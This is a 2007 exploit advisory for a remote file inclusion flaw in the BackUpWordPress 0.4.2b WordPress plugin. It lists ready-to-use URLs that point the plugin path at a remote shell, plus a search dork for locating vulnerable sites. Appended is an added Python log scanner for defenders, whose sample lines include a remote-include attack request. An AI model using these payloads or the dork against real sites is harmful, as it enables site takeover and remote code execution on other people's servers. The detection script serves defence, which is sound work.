
01.11.2007, 19:21
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Code:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
Mirror:
http://www.milw0rm.com/exploits/4593
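For defenders checking whether a site was probed for this issue, the following added example (not part of the original post or of the plugin) scans web access logs for requests that set the `bkpwp_plugin_path` variable from the vulnerable line. The combined log format, the `/wp-content/` prefix, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "bkpwp_plugin_path"  # variable named in the advisory's vulnerable line
# Assumed input: Apache/nginx "combined" access-log lines.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Scheme prefixes that make a PHP include go through a URL/stream wrapper.
WRAPPER_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.I)


def classify(line):
    """Return (client, path, verdict) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    # parse_qs percent-decodes once, so encoded and plain values compare equal.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    # Assumption: the plugin sets this value itself and no client sends it,
    # so its presence in a request is a finding whatever the value is.
    remote = any(WRAPPER_RE.match(v) for v in values)
    return client, url.path, "remote-include" if remote else "override"


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Nov/2007:19:40:02 +0000] "GET /wp-content/plugins/BackUp/Archive.php'
    '?bkpwp_plugin_path=http://files.example.invalid/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Nov/2007:19:40:05 +0000] "GET /wp-content/plugins/BackUp/Archive/Reader.php'
    '?bkpwp_plugin_path=HTTP%3A%2F%2Ffiles.example.invalid%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Nov/2007:20:02:11 +0000] "GET /wp-content/plugins/BackUp/Archive/Writer.php'
    '?bkpwp_plugin_path=/tmp/ HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Nov/2007:20:05:40 +0000] "GET /wp-admin/index.php?page=backup HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

With `register_globals` enabled the same variable can also arrive in a POST body or cookie, which an access log does not record, so a clean result here is only partial coverage.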